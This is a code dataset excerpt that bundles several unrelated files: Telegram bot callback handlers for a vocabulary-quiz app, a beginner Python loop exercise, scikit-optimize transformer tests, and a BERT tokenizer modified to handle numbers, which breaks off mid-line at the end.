self.lang.parse_user_lang(query['from']['id']) selected_lang = query['data'][-2:] if selected_lang != user_lang: self.db.set_user_lang(query['from']['id'], selected_lang) await query.message.delete() await query.message.answer(text=self.lang.get_page_text('LANG_SETTINGS', 'SUCCESS', selected_lang), reply_markup=self.markup.get_main_menu_markup(selected_lang)) await query.answer() else: await query.answer(self.lang.get_page_text('LANG_SETTINGS', 'ERROR', user_lang), show_alert=True) @self.dp.callback_query_handler(lambda query: query.data.startswith('help_question_')) @self.analytics.callback_metric async def help_callback_handler(query: types.CallbackQuery): """Handle HELP page question buttons""" user_id = query['from']['id'] user_lang = self.lang.parse_user_lang(user_id) question = query['data'] await query.message.edit_text(self.lang.get_page_text("HELP", question, user_lang)) await query.message.edit_reply_markup(self.markup.get_help_back_markup(user_lang)) await query.answer() @self.dp.callback_query_handler(lambda query: query.data == 'back_to_help') @self.analytics.callback_metric async def back_to_help_callback_handler(query: types.CallbackQuery): """Handle HELP page question back button""" user_id = query['from']['id'] user_lang = self.lang.parse_user_lang(user_id) await query.message.edit_text(self.lang.get_page_text("HELP", "TEXT", user_lang)) await query.message.edit_reply_markup(self.markup.get_help_markup(user_lang)) await query.answer() @self.dp.callback_query_handler(lambda query: query.data.startswith('settings_')) @self.analytics.callback_metric async def settings_page_callback_handler(query: types.CallbackQuery): """Handle SETTINGS page buttons""" user_id = query['from']['id'] user_lang = self.lang.parse_user_lang(user_id) page = query['data'][9:] if page == 'interface': await query.message.edit_text(self.lang.get_page_text("LANG_SETTINGS", "TEXT", user_lang)) await query.message.edit_reply_markup(self.markup.get_lang_settings_markup(user_lang)) await query.answer() elif page == 'newsletters': await query.message.edit_text(self.lang.get_page_text("NEWSLETTER_SETTINGS", "TEXT", user_lang)) await query.message.edit_reply_markup(self.markup.get_news_settings_markup(user_lang)) await query.answer() @self.dp.callback_query_handler(lambda query: query.data.startswith('news_setting_')) @self.analytics.callback_metric async def language_settings_callback_handler(query: types.CallbackQuery): """Newsletters settings""" user_lang = self.lang.parse_user_lang(query['from']['id']) selected_option = query['data'][13:] user_mailings = self.db.get_user_mailings(query['from']['id']) mailings_settings = ['disable', 'important', 'all'] if mailings_settings[user_mailings] != selected_option: if selected_option == 'all' and user_mailings != 2: self.db.set_user_mailings(query['from']['id'], 2) elif selected_option == 'important' and user_mailings != 1: self.db.set_user_mailings(query['from']['id'], 1) elif selected_option == 'disable' and user_mailings != 0: self.db.set_user_mailings(query['from']['id'], 0) await query.message.delete() await query.message.answer(self.lang.get_page_text("NEWSLETTER_SETTINGS", "SUCCESS", user_lang)) else: await query.answer(self.lang.get_page_text('NEWSLETTER_SETTINGS', 'ALREADY_SET', user_lang), show_alert=True) async def _send_dictionary_page(message: types.Message, user_id: int, user_lang: str, from_lang: str, to_lang: str, state: FSMContext): current_state = { 'current_page': 0, 'from_lang': from_lang, 'to_lang': to_lang } paginator = getattr(pagination, 'dictionary'.capitalize() + 'Paginator')(self.lang, self.db, self.markup, user_id, current_page=current_state) await message.answer(text=self.lang.get_page_text('DICTIONARY', 'TEXT', user_lang), reply_markup=self.markup.get_dictionary_markup(user_lang)) await message.answer(text=paginator.first_page(user_lang), reply_markup=paginator.get_reply_markup()) async with state.proxy() as data: data['curr_pagination_page'] = current_state await DictionaryState.dictionary.set() @self.dp.callback_query_handler(lambda query: query.data.startswith('dictionary_'), state="*") @self.analytics.callback_fsm_metric async def dictionary_list_callback_handler(query: types.CallbackQuery, state: FSMContext): user_lang = self.lang.parse_user_lang(query['from']['id']) selected_dict_pairs = query.data[11:].split('_') from_lang = selected_dict_pairs[0] to_lang = selected_dict_pairs[1] await query.message.delete() await _send_dictionary_page(query.message, query['from']['id'], user_lang, from_lang, to_lang, state) # PAGINATION @self.dp.callback_query_handler(lambda query: query.data.startswith('first_'), state="*") @self.analytics.callback_fsm_metric async def pagination_first_callback_handler(query: types.CallbackQuery, state: FSMContext): action = query.data[6:] user_lang = self.lang.parse_user_lang(query['from']['id']) async with state.proxy() as data: if 'curr_pagination_page' in data: current_page = data['curr_pagination_page'] paginator = getattr(pagination, action.capitalize() + 'Paginator')(self.lang, self.db, self.markup, query['from']['id'], current_page=current_page) if not paginator.is_first(): await query.message.edit_text(text=paginator.first_page(user_lang), reply_markup=paginator.get_reply_markup(), parse_mode=paginator.get_parse_mode()) data['curr_pagination_page'] = paginator.get_state_data() else: await query.answer(self.lang.get_page_text('PAGINATION', 'FIRST_REACHED', user_lang), show_alert=True) logging.getLogger(type(self).__name__).info(f'[{action}] callback executed.') await query.answer() @self.dp.callback_query_handler(lambda query: query.data.startswith('prev_'), state="*") @self.analytics.callback_fsm_metric async def pagination_prev_callback_handler(query: types.CallbackQuery, state: FSMContext): action = query.data[5:] user_lang = self.lang.parse_user_lang(query['from']['id']) async with state.proxy() as data: if 'curr_pagination_page' in data: current_page = data['curr_pagination_page'] paginator = getattr(pagination, action.capitalize() + 'Paginator')(self.lang, self.db, self.markup, query['from']['id'], current_page=current_page) if not paginator.is_first(): await query.message.edit_text(text=paginator.prev_page(user_lang), reply_markup=paginator.get_reply_markup(), parse_mode=paginator.get_parse_mode()) data['curr_pagination_page'] = paginator.get_state_data() else: await query.answer(self.lang.get_page_text('PAGINATION', 'FIRST_REACHED', user_lang), show_alert=True) logging.getLogger(type(self).__name__).info(f'[{action}] callback executed.') await query.answer() @self.dp.callback_query_handler(lambda query: query.data.startswith('next_'), state="*") @self.analytics.callback_fsm_metric async def pagination_next_callback_handler(query: types.CallbackQuery, state: FSMContext): action = query.data[5:] user_lang = self.lang.parse_user_lang(query['from']['id']) async with state.proxy() as data: if 'curr_pagination_page' in data: current_page = data['curr_pagination_page'] paginator = getattr(pagination, action.capitalize() + 'Paginator')(self.lang, self.db, self.markup, query['from']['id'], current_page=current_page) if not paginator.is_last(): await query.message.edit_text(text=paginator.next_page(user_lang), reply_markup=paginator.get_reply_markup(), parse_mode=paginator.get_parse_mode()) data['curr_pagination_page'] = paginator.get_state_data() else: await query.answer(self.lang.get_page_text('PAGINATION', 'LAST_REACHED', user_lang), show_alert=True) logging.getLogger(type(self).__name__).info(f'[{action}] callback executed.') await query.answer() @self.dp.callback_query_handler(lambda query: query.data.startswith('last_'), state="*") @self.analytics.callback_fsm_metric async def pagination_last_callback_handler(query: types.CallbackQuery, state: FSMContext): action = query.data[5:] user_lang = self.lang.parse_user_lang(query['from']['id']) async with state.proxy() as data: if 'curr_pagination_page' in data: current_page = data['curr_pagination_page'] paginator = getattr(pagination, action.capitalize() + 'Paginator')(self.lang, self.db, self.markup, query['from']['id'], current_page=current_page) if not paginator.is_last(): await query.message.edit_text(text=paginator.last_page(user_lang), reply_markup=paginator.get_reply_markup(), parse_mode=paginator.get_parse_mode()) data['curr_pagination_page'] = paginator.get_state_data() else: await query.answer(self.lang.get_page_text('PAGINATION', 'LAST_REACHED', user_lang), show_alert=True) logging.getLogger(type(self).__name__).info(f'[{action}] callback executed.') await query.answer() @self.dp.callback_query_handler(lambda query: query.data == 'profile_referral_link') @self.analytics.callback_metric async def profile_referral_link_callback_handler(query: types.CallbackQuery): user_lang = self.lang.parse_user_lang(query['from']['id']) await query.message.answer(self.lang.get_user_referral_link_page(query['from']['id'], user_lang)) await query.message.edit_reply_markup(None) await query.answer() @self.dp.callback_query_handler(lambda query: query.data.startswith('mailings_')) @self.analytics.callback_metric async def admin_mailings_new_callback_handler(query: types.CallbackQuery): user_lang = self.lang.parse_user_lang(query['from']['id']) action = query['data'][9:] if action == 'new': await AdminMailingState.message.set() await query.message.delete() await query.message.answer(text=self.lang.get_page_text('MAILINGS', 'NEW', user_lang), reply_markup=self.markup.get_cancel_markup()) elif action == 'schedule_list': await query.answer() # QUIZ CALLBACKS @self.dp.callback_query_handler(lambda query: query.data == 'quiz_start', state="*") @self.analytics.callback_fsm_metric async def quiz_start_callback_handler(query: types.CallbackQuery, state: FSMContext): await query.answer() await query.message.delete() user_lang = self.lang.parse_user_lang(query['from']['id']) async with state.proxy() as data: from_lang = data['curr_pagination_page']['from_lang'] to_lang = data['curr_pagination_page']['to_lang'] quiz_data = self.db.get_user_quiz_data(query['from']['id'], from_lang, to_lang, 10) await DictionaryQuizState.user_answers.set() async with state.proxy() as data: data['quiz_results'] = [] data['quiz_data'] = quiz_data data['index'] = 1 question = f"{data['index']}/{len(data['quiz_data'])} " + \ self.lang.get_page_text('QUIZ', 'QUESTION', user_lang).format(quiz_data[0]['word']) await self.bot.send_poll(chat_id=query['from']['id'], question=question, options=quiz_data[0]['options'], correct_option_id=quiz_data[0]['options'].index(quiz_data[0]['answer']), type='quiz', reply_markup=self.markup.get_quiz_next_markup(user_lang)) @self.dp.callback_query_handler(state=DictionaryQuizState.user_answers) @self.analytics.callback_fsm_metric async def quiz_next_callback_handler(query: types.CallbackQuery, state: FSMContext): user_lang = self.lang.parse_user_lang(query['from']['id']) if query.message.poll.total_voter_count == 1: await query.answer() await query.message.delete() async with state.proxy() as data: curr_q_index = data['index'] quiz_result = { 'word': data['quiz_data'][curr_q_index - 1]['word'], 'selected_option': query.message.poll.options.index( list(filter(lambda item: item.voter_count == 1, query.message.poll.options))[0]), 'correct_option': query.message.poll.correct_option_id, 'options': list(map(lambda item: dict(item), query.message.poll.options)) } data['quiz_results'].append(quiz_result) if curr_q_index < len(data['quiz_data']) - 1: data['index'] = curr_q_index + 1 question = f"{data['index']}/{len(data['quiz_data'])} " else: question = f"{len(data['quiz_data'])}/{len(data['quiz_data'])} " await DictionaryQuizState.finish.set() question += self.lang.get_page_text('QUIZ', 'QUESTION', user_lang).format( data['quiz_data'][curr_q_index]['word']) await self.bot.send_poll(chat_id=query['from']['id'], question=question, options=data['quiz_data'][curr_q_index]['options'], correct_option_id=data['quiz_data'][curr_q_index]['options'].index( data['quiz_data'][curr_q_index]['answer']), type='quiz', reply_markup=self.markup.get_quiz_next_markup(user_lang) if curr_q_index != len(data['quiz_data']) - 1 else self.markup.get_quiz_finish_markup(user_lang)) else: await query.answer(self.lang.get_page_text('QUIZ', 'NON_SELECTED', user_lang), show_alert=True) @self.dp.callback_query_handler(state=DictionaryQuizState.finish) @self.analytics.callback_fsm_metric async def quiz_finish_callback_handler(query: types.CallbackQuery, state: FSMContext): user_lang = self.lang.parse_user_lang(query['from']['id']) if query.message.poll.total_voter_count == 1: await query.answer() await query.message.delete() async with state.proxy() as data: quiz_result = { 'word': data['quiz_data'][data['index']]['word'], 'selected_option': query.message.poll.options.index( list(filter(lambda item: item.voter_count == 1, query.message.poll.options))[0]), 'correct_option': query.message.poll.correct_option_id, 'options': list(map(lambda item: dict(item), query.message.poll.options)) } data['quiz_results'].append(quiz_result) await query.message.answer(self.lang.get_page_text('QUIZ', 'FINISH', user_lang)) await query.message.answer(self.lang.get_quiz_results_page(data['quiz_results'], user_lang), parse_mode='Markdown') last_pagination_page = data['curr_pagination_page'] await state.finish() await DictionaryState.dictionary.set() async with state.proxy() as data: data['curr_pagination_page'] = last_pagination_page else: await query.answer(self.lang.get_page_text('QUIZ', 'NON_SELECTED', user_lang), show_alert=True) @self.dp.callback_query_handler(state=DictionarySearchWordState.search_query) @self.analytics.callback_fsm_metric async def search_word_actions_callback_handler(query: types.CallbackQuery, state: FSMContext): user_lang = self.lang.parse_user_lang(query['from']['id']) action = query.data[10:] if action == 'add': async with state.proxy() as data: new_word_string = data['search_query'] new_word_translation = data['translation'] from_lang = data['curr_pagination_page']['from_lang'] to_lang = data['curr_pagination_page']['to_lang'] self.db.add_user_word(new_word_string, new_word_translation, query['from']['id'], from_lang, to_lang) await query.message.edit_text(self.lang.get_page_text('ADD_WORD', 'SUCCESSFUL_ADDED', user_lang)) await state.finish() await asyncio.sleep(1) await _send_dictionary_page(query.message, query['from']['id'], user_lang, from_lang, to_lang, state) elif action == 'find_another': await query.message.delete() await query.message.answer(text=self.lang.get_page_text('FIND_WORD', 'WELCOME_TEXT', user_lang), reply_markup=self.markup.get_cancel_markup()) @self.dp.callback_query_handler(state=DictionaryEditWordState.search_query) @self.analytics.callback_metric async def edit_word_actions_callback_handler(query: types.CallbackQuery): user_lang = self.lang.parse_user_lang(query['from']['id']) action = query.data[10:] if action == 'string': await DictionaryEditWordState.new_word_string.set() await query.message.delete() await query.message.answer(text=self.lang.get_page_text('EDIT_WORD', 'NEW_STRING', user_lang), reply_markup=self.markup.get_cancel_markup()) elif action == 'translation': await DictionaryEditWordState.new_word_translation.set() await query.message.delete() await query.message.answer(text=self.lang.get_page_text('EDIT_WORD', 'NEW_TRANSLATION', user_lang), reply_markup=self.markup.get_cancel_markup())
2.09375
2
1-Python-Programming-Basics (Sep 2020)/Course-Exercises-and-Exams/06_Nested-Loops/02.Exercise-06-Special-Numbers.py
karolinanikolova/SoftUni-Software-Engineering
0
5535
# 6. Специални числа # Да се напише програма, която чете едно цяло число N, въведено от потребителя, и генерира всички възможни "специални" # числа от 1111 до 9999. За да бъде “специално” едно число, то трябва да отговаря на следното условие: # • N да се дели на всяка една от неговите цифри без остатък. # Пример: при N = 16, 2418 е специално число: # • 16 / 2 = 8 без остатък # • 16 / 4 = 4 без остатък # • 16 / 1 = 16 без остатък # • 16 / 8 = 2 без остатък N = int(input()) for number in range(1111, 9999 + 1): is_number_special = True number_as_string = str(number) # Could also write for index, digit in enumerate(number_as_string): but since we don't need the index we don't need enumerate. for digit in number_as_string: if int(digit) == 0 or N % int(digit) != 0: is_number_special = False break if is_number_special: print(f'{number_as_string}', end = ' ')
3.953125
4
skopt/tests/test_transformers.py
sqbl/scikit-optimize
0
5536
import pytest import numbers import numpy as np from numpy.testing import assert_raises from numpy.testing import assert_array_equal from numpy.testing import assert_equal from numpy.testing import assert_raises_regex from skopt.space import LogN, Normalize @pytest.mark.fast_test def test_logn2_integer(): transformer = LogN(2) for X in range(2, 31): X_orig = transformer.inverse_transform(transformer.transform(X)) assert_array_equal(int(np.round(X_orig)), X) @pytest.mark.fast_test def test_logn10_integer(): transformer = LogN(2) for X in range(2, 31): X_orig = transformer.inverse_transform(transformer.transform(X)) assert_array_equal(int(np.round(X_orig)), X) @pytest.mark.fast_test def test_normalize_integer(): transformer = Normalize(1, 20, is_int=True) assert transformer.transform(19.8) == 1.0 assert transformer.transform(20.2) == 1.0 assert transformer.transform(1.2) == 0.0 assert transformer.transform(0.9) == 0.0 assert_raises(ValueError, transformer.transform, 20.6) assert_raises(ValueError, transformer.transform, 0.4) assert transformer.inverse_transform(0.99) == 20 assert transformer.inverse_transform(0.01) == 1 assert_raises(ValueError, transformer.inverse_transform, 1. + 1e-8) assert_raises(ValueError, transformer.transform, 0. - 1e-8) @pytest.mark.fast_test def test_normalize(): transformer = Normalize(1, 20, is_int=False) assert transformer.transform(20.) == 1.0 assert transformer.transform(1.) == 0.0 assert_raises(ValueError, transformer.transform, 20. + 1e-7) assert_raises(ValueError, transformer.transform, 1.0 - 1e-7) assert_raises(ValueError, transformer.inverse_transform, 1. + 1e-8) assert_raises(ValueError, transformer.transform, 0. - 1e-8)
2.390625
2
tokenization_numerical.py
dspoka/mnm
1
5537
<gh_stars>1-10 # coding=utf-8 # Copyright 2018 The Google AI Language Team Authors and The HuggingFace Inc. team. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Tokenization classes.""" from __future__ import absolute_import, division, print_function, unicode_literals import collections import logging import os import sys import unicodedata from io import open from transformers import PreTrainedTokenizer logger = logging.getLogger(__name__) VOCAB_FILES_NAMES = {'vocab_file': 'vocab.txt'} PRETRAINED_VOCAB_FILES_MAP = { 'vocab_file': { 'bert-base-uncased': "https://s3.amazonaws.com/models.huggingface.co/bert/bert-base-uncased-vocab.txt", 'bert-large-uncased': "https://s3.amazonaws.com/models.huggingface.co/bert/bert-large-uncased-vocab.txt", 'bert-base-cased': "https://s3.amazonaws.com/models.huggingface.co/bert/bert-base-cased-vocab.txt", 'bert-large-cased': "https://s3.amazonaws.com/models.huggingface.co/bert/bert-large-cased-vocab.txt", 'bert-base-multilingual-uncased': "https://s3.amazonaws.com/models.huggingface.co/bert/bert-base-multilingual-uncased-vocab.txt", 'bert-base-multilingual-cased': "https://s3.amazonaws.com/models.huggingface.co/bert/bert-base-multilingual-cased-vocab.txt", 'bert-base-chinese': "https://s3.amazonaws.com/models.huggingface.co/bert/bert-base-chinese-vocab.txt", 'bert-base-german-cased': "https://int-deepset-models-bert.s3.eu-central-1.amazonaws.com/pytorch/bert-base-german-cased-vocab.txt", 'bert-large-uncased-whole-word-masking': "https://s3.amazonaws.com/models.huggingface.co/bert/bert-large-uncased-whole-word-masking-vocab.txt", 'bert-large-cased-whole-word-masking': "https://s3.amazonaws.com/models.huggingface.co/bert/bert-large-cased-whole-word-masking-vocab.txt", 'bert-large-uncased-whole-word-masking-finetuned-squad': "https://s3.amazonaws.com/models.huggingface.co/bert/bert-large-uncased-whole-word-masking-finetuned-squad-vocab.txt", 'bert-large-cased-whole-word-masking-finetuned-squad': "https://s3.amazonaws.com/models.huggingface.co/bert/bert-large-cased-whole-word-masking-finetuned-squad-vocab.txt", 'bert-base-cased-finetuned-mrpc': "https://s3.amazonaws.com/models.huggingface.co/bert/bert-base-cased-finetuned-mrpc-vocab.txt", } } PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES = { 'bert-base-uncased': 512, 'bert-large-uncased': 512, 'bert-base-cased': 512, 'bert-large-cased': 512, 'bert-base-multilingual-uncased': 512, 'bert-base-multilingual-cased': 512, 'bert-base-chinese': 512, 'bert-base-german-cased': 512, 'bert-large-uncased-whole-word-masking': 512, 'bert-large-cased-whole-word-masking': 512, 'bert-large-uncased-whole-word-masking-finetuned-squad': 512, 'bert-large-cased-whole-word-masking-finetuned-squad': 512, 'bert-base-cased-finetuned-mrpc': 512, } def load_vocab(vocab_file): """Loads a vocabulary file into a dictionary.""" vocab = collections.OrderedDict() with open(vocab_file, "r", encoding="utf-8") as reader: tokens = reader.readlines() for index, token in enumerate(tokens): token = token.rstrip('\n') vocab[token] = index return vocab def whitespace_tokenize(text): """Runs basic whitespace cleaning and splitting on a piece of text.""" text = text.strip() if not text: return [] tokens = text.split() return tokens class BertNumericalTokenizer(PreTrainedTokenizer): r""" Constructs a BertTokenizer. :class:`~pytorch_transformers.BertTokenizer` runs end-to-end tokenization: punctuation splitting + wordpiece Args: vocab_file: Path to a one-wordpiece-per-line vocabulary file do_lower_case: Whether to lower case the input. Only has an effect when do_wordpiece_only=False do_basic_tokenize: Whether to do basic tokenization before wordpiece. max_len: An artificial maximum length to truncate tokenized sequences to; Effective maximum length is always the minimum of this value (if specified) and the underlying BERT model's sequence length. never_split: List of tokens which will never be split during tokenization. Only has an effect when do_wordpiece_only=False """ vocab_files_names = VOCAB_FILES_NAMES pretrained_vocab_files_map = PRETRAINED_VOCAB_FILES_MAP max_model_input_sizes = PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES def __init__(self, vocab_file, do_lower_case=True, do_basic_tokenize=True, never_split=None, unk_token="[UNK]", sep_token="[SEP]", pad_token="[PAD]", cls_token="[CLS]", mask_token="[MASK]", tokenize_chinese_chars=True, **kwargs): """Constructs a BertNumericalTokenizer. Args: **vocab_file**: Path to a one-wordpiece-per-line vocabulary file **do_lower_case**: (`optional`) boolean (default True) Whether to lower case the input Only has an effect when do_basic_tokenize=True **do_basic_tokenize**: (`optional`) boolean (default True) Whether to do basic tokenization before wordpiece. **never_split**: (`optional`) list of string List of tokens which will never be split during tokenization. Only has an effect when do_basic_tokenize=True **tokenize_chinese_chars**: (`optional`) boolean (default True) Whether to tokenize Chinese characters. This should likely be deactivated for Japanese: see: https://github.com/huggingface/pytorch-pretrained-BERT/issues/328 """ super(BertNumericalTokenizer, self).__init__(unk_token=unk_token, sep_token=sep_token, pad_token=pad_token, cls_token=cls_token, mask_token=mask_token, **kwargs) if not os.path.isfile(vocab_file): raise ValueError( "Can't find a vocabulary file at path '{}'. To load the vocabulary from a Google pretrained " "model use `tokenizer = BertNumericalTokenizer.from_pretrained(PRETRAINED_MODEL_NAME)`".format(vocab_file)) self.vocab = load_vocab(vocab_file) self.unk_num = '[UNK_NUM]' self.default_value = 1.0 never_split = ['[UNK_NUM]'] self.ids_to_tokens = collections.OrderedDict( [(ids, tok) for tok, ids in self.vocab.items()]) self.do_basic_tokenize = do_basic_tokenize self.numerical_tokenizer = NumericalTokenizer(do_lower_case=do_lower_case, never_split=never_split) if do_basic_tokenize: self.basic_tokenizer = BasicTokenizer(do_lower_case=do_lower_case, never_split=never_split, tokenize_chinese_chars=tokenize_chinese_chars) self.wordpiece_tokenizer = WordpieceTokenizer(vocab=self.vocab, unk_token=self.unk_token, unk_num=self.unk_num) @property def vocab_size(self): return len(self.vocab) def _tokenize(self, text, get_values=False, get_sigfigs=None, get_numeric_masks=None): split_tokens = [] numeric_values = [] numeric_masks = [] split_sigfigs = [] i = 0 for (token, sigfig) in self.numerical_tokenizer.tokenize(text, never_split=self.all_special_tokens): for (sub_token, numeric_value, numeric_mask) in self.wordpiece_tokenizer.tokenize(token): split_tokens.append(sub_token) numeric_values.append(numeric_value) numeric_masks.append(numeric_mask) if numeric_value != self.default_value: split_sigfigs.append(sigfig) else: split_sigfigs.append('-1') if numeric_value != self.default_value and sub_token != self.unk_num: print(sub_token, numeric_value) foohere if get_numeric_masks: return numeric_masks if get_values: return numeric_values assert len(split_tokens) == len(numeric_values) == len(split_sigfigs) if get_sigfigs: return split_sigfigs return split_tokens def _convert_token_to_id(self, token): """ Converts a token (str/unicode) in an id using the vocab. """ return self.vocab.get(token, self.vocab.get(self.unk_token)) def _convert_id_to_token(self, index): """Converts an index (integer) in a token (string/unicode) using the vocab.""" return self.ids_to_tokens.get(index, self.unk_token) def convert_tokens_to_string(self, tokens): """ Converts a sequence of tokens (string) in a single string. """ out_string = ' '.join(tokens).replace(' ##', '').strip() return out_string def save_vocabulary(self, vocab_path): """Save the tokenizer vocabulary to a directory or file.""" index = 0 if os.path.isdir(vocab_path): vocab_file = os.path.join(vocab_path, VOCAB_FILES_NAMES['vocab_file']) with open(vocab_file, "w", encoding="utf-8") as writer: for token, token_index in sorted(self.vocab.items(), key=lambda kv: kv[1]): if index != token_index: logger.warning("Saving vocabulary to {}: vocabulary indices are not consecutive." " Please check that the vocabulary is not corrupted!".format(vocab_file)) index = token_index writer.write(token + u'\n') index += 1 return (vocab_file,) @classmethod def from_pretrained(cls, pretrained_model_name_or_path, *inputs, **kwargs): """ Instantiate a BertNumericalTokenizer from pre-trained vocabulary files. """ if pretrained_model_name_or_path in PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES: if '-cased' in pretrained_model_name_or_path and kwargs.get('do_lower_case', True): logger.warning("The pre-trained model you are loading is a cased model but you have not set " "`do_lower_case` to False. We are setting `do_lower_case=False` for you but " "you may want to check this behavior.") kwargs['do_lower_case'] = False elif '-cased' not in pretrained_model_name_or_path and not kwargs.get('do_lower_case', True): logger.warning("The pre-trained model you are loading is an uncased model but you have set " "`do_lower_case` to False. We are setting `do_lower_case=True` for you " "but you may want to check this behavior.") kwargs['do_lower_case'] = True return super(BertNumericalTokenizer, cls)._from_pretrained(pretrained_model_name_or_path, *inputs, **kwargs) class NumericalTokenizer(object): """Runs basic tokenization (punctuation splitting, lower casing, etc.).""" def __init__(self, do_lower_case=True, never_split=None): """ Constructs a BasicTokenizer. Args: **do_lower_case**: Whether to lower case the input. **never_split**: (`optional`) list of str Kept for backward compatibility purposes. Now implemented directly at the base class level (see :func:`PreTrainedTokenizer.tokenize`) List of token not to split. """ if never_split is None: never_split = [] self.do_lower_case = do_lower_case self.never_split = never_split def tokenize(self, text, never_split=None): """ Basic Numerical Tokenization of a piece of text. Args: **never_split**: (`optional`) list of str Kept for backward compatibility purposes. Now implemented directly at the base class level (see :func:`PreTrainedTokenizer.tokenize`) List of token not to split. """ # digits = '0123456789' # punctuation = '$%' # text = self._clean_text(text) # orig_tokens = whitespace_tokenize(text) split_tokens, split_sigfigs = normalize_numbers_in_sent(text) output_tokens = whitespace_tokenize(" ".join(split_tokens)) output_sigfigs = whitespace_tokenize(" ".join(split_sigfigs)) return zip(output_tokens,split_sigfigs) # return output_tokens, # _numbers = '[0-9]*\.?[0-9]+([eE][-+]?[0-9]+)?' # fraction_pattern = re.compile(_fraction) # number_pattern = re.compile(_numbers) class BasicTokenizer(object): """Runs basic tokenization (punctuation splitting, lower casing, etc.).""" def __init__(self, do_lower_case=True, never_split=None, tokenize_chinese_chars=True): """ Constructs a BasicTokenizer. Args: **do_lower_case**: Whether to lower case the input. **never_split**: (`optional`) list of str Kept for backward compatibility purposes. Now implemented directly at the base class level (see :func:`PreTrainedTokenizer.tokenize`) List of token not to split. **tokenize_chinese_chars**: (`optional`) boolean (default True) Whether to tokenize Chinese characters. This should likely be deactivated for Japanese: see: https://github.com/huggingface/pytorch-pretrained-BERT/issues/328 """ if never_split is None: never_split = [] self.do_lower_case = do_lower_case self.never_split = never_split self.tokenize_chinese_chars = tokenize_chinese_chars def tokenize(self, text, never_split=None): """ Basic Tokenization of a piece of text. Split on "white spaces" only, for sub-word tokenization, see WordPieceTokenizer. Args: **never_split**: (`optional`) list of str Kept for backward compatibility purposes. Now implemented directly at the base class level (see :func:`PreTrainedTokenizer.tokenize`) List of token not to split. """ never_split = self.never_split + (never_split if never_split is not None else []) text = self._clean_text(text) # This was added on November 1st, 2018 for the multilingual and Chinese # models. This is also applied to the English models now, but it doesn't # matter since the English models were not trained on any Chinese data # and generally don't have any Chinese data in them (there are Chinese # characters in the vocabulary because Wikipedia does have some Chinese # words in the English Wikipedia.). if self.tokenize_chinese_chars: text = self._tokenize_chinese_chars(text) orig_tokens = whitespace_tokenize(text) split_tokens = [] for token in orig_tokens: if self.do_lower_case and token not in never_split: token = token.lower() token = self._run_strip_accents(token) split_tokens.extend(self._run_split_on_punc(token)) output_tokens = whitespace_tokenize(" ".join(split_tokens)) return output_tokens def _run_strip_accents(self, text): """Strips accents from a piece of text.""" text = unicodedata.normalize("NFD", text) output = [] for char in text: cat = unicodedata.category(char) if cat == "Mn": continue output.append(char) return "".join(output) def _run_split_on_punc(self, text, never_split=None): """Splits punctuation on a piece of text.""" if never_split is not None and text in never_split: return [text] chars = list(text) i = 0 start_new_word = True output = [] while i < len(chars): char = chars[i] #dont split on periods if number is before it # if _is_punctuation(char) and not chars[i-1].isdigit() or _is_punctuation(char) and i == 0: if _is_punctuation(char): if i == 0: do_split = True elif i == len(chars)-1: do_split = True else: if not chars[i-1].isdigit(): do_split = True else: do_split = False else: do_split = False if do_split: output.append([char]) start_new_word = True else: if start_new_word: output.append([]) start_new_word = False output[-1].append(char) i += 1 return ["".join(x) for x in output] def _tokenize_chinese_chars(self, text): """Adds whitespace around any CJK character.""" output = [] for char in text: cp = ord(char) if self._is_chinese_char(cp): output.append(" ") output.append(char) output.append(" ") else: output.append(char) return "".join(output) def _is_chinese_char(self, cp): """Checks whether CP is the codepoint of a CJK character.""" # This defines a "chinese character" as anything in the CJK Unicode block: # https://en.wikipedia.org/wiki/CJK_Unified_Ideographs_(Unicode_block) # # Note that the CJK Unicode block is NOT all Japanese and Korean characters, # despite its name. The modern Korean Hangul alphabet is a different block, # as is Japanese Hiragana and Katakana. Those alphabets are used to write # space-separated words, so they are not treated specially and handled # like the all of the other languages. if ((cp >= 0x4E00 and cp <= 0x9FFF) or # (cp >= 0x3400 and cp <= 0x4DBF) or # (cp >= 0x20000 and cp <= 0x2A6DF) or # (cp >= 0x2A700 and cp <= 0x2B73F) or # (cp >= 0x2B740 and cp <= 0x2B81F) or # (cp >= 0x2B820 and cp <= 0x2CEAF) or (cp >= 0xF900 and cp <= 0xFAFF) or # (cp >= 0x2F800 and cp <= 0x2FA1F)): # return True return False def _clean_text(self, text): """Performs invalid character removal and whitespace cleanup on text.""" output = [] for char in text: cp = ord(char) if cp == 0 or cp == 0xfffd or _is_control(char): continue if _is_whitespace(char): output.append(" ") else: output.append(char) return "".join(output) class WordpieceTokenizer(object): """Runs WordPiece tokenization.""" def __init__(self, vocab, unk_token, unk_num, max_input_chars_per_word=100): self.vocab = vocab self.unk_token = unk_token self.unk_num = unk_num self.default_value = 1.0 self.max_input_chars_per_word = max_input_chars_per_word def tokenize(self, text): """Tokenizes a piece of text into its word pieces. This uses a greedy longest-match-first algorithm to perform tokenization using the given vocabulary. For example: input = "unaffable" output = ["un", "##aff", "##able"] Args: text: A single token or whitespace separated tokens. This should have already been passed through `BasicTokenizer`. Returns: A list of wordpiece tokens. """ output_tokens = [] numeric_values = [] numeric_mask = [] for token in whitespace_tokenize(text): chars = list(token) if len(chars) > self.max_input_chars_per_word: output_tokens.append(self.unk_token) numeric_values.append(self.default_value) numeric_mask.append(0) continue is_bad = False start = 0 sub_tokens = [] while start < len(chars): try: if token not in ['infinity', 'inf', 'nan']: numeric_value = float(token) is_number = True else: is_number = False except: ValueError is_number = False end = len(chars) cur_substr = None while start < end: substr = "".join(chars[start:end]) if start > 0: substr = "##" + substr if substr in self.vocab and is_number == False: cur_substr = substr break end -= 1 if cur_substr is None: is_bad = True break sub_tokens.append(cur_substr) start = end if is_number: #ACTUAL NUMBER HERE output_tokens.append(self.unk_num) numeric_values.append(numeric_value) numeric_mask.append(1) elif is_bad: output_tokens.append(self.unk_token) numeric_values.append(self.default_value)#-9e9 numeric_mask.append(0) else: numeric_values.extend([self.default_value]*len(sub_tokens))#-9e9 numeric_mask.extend([0]*len(sub_tokens)) output_tokens.extend(sub_tokens) assert len(numeric_values) == len(output_tokens) == 